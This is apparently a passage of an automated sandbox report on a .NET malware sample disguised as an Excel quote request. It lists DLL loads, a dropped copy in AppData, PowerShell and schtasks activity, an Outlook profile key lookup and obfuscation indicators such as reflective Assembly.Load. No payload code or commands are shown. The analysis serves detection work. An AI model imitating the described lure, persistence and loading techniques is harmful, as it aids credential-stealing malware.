                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: vamE.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr
                    Source: Binary string: vamE.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr

                    Data Obfuscation

                    barindex
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: YzkHZRBcm.exe.0.dr, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs.Net Code: GYpIrLWauj System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs.Net Code: GYpIrLWauj System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3374a04.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7c80000.5.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs.Net Code: GYpIrLWauj System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_031DF508 push esp; iretd 0_2_031DF539
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC8541 pushad ; retf 0_2_07DC854D
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_07DC84E9 push esp; retf 0_2_07DC84F5
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133900B push edx; retf 9_2_01339012
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01339093 push ebp; retf 9_2_01339462
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01339091 push ebx; retf 9_2_01339092
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01339089 push ebx; retf 9_2_0133908A
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133A088 pushad ; retf 9_2_0133A0EA
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133A0EB pushad ; retf 9_2_0133A0F2
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_0133A0E8 pushad ; retf 9_2_0133A0EA
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01339468 push esi; retf 9_2_0133961A
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01338490 push edx; retf 9_2_01338EEA
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01338481 push ecx; retf 9_2_01338482
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01339611 push edi; retf 9_2_01339612
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01339DE0 pushad ; retf 9_2_0133A02A
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 9_2_01338EEB push edx; retf 9_2_01338EF2
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_0102F463 push esp; iretd 10_2_0102F539
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_051E9F40 push eax; mov dword ptr [esp], edx10_2_051E9F54
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 10_2_071B7750 push esp; retf 10_2_071B775D
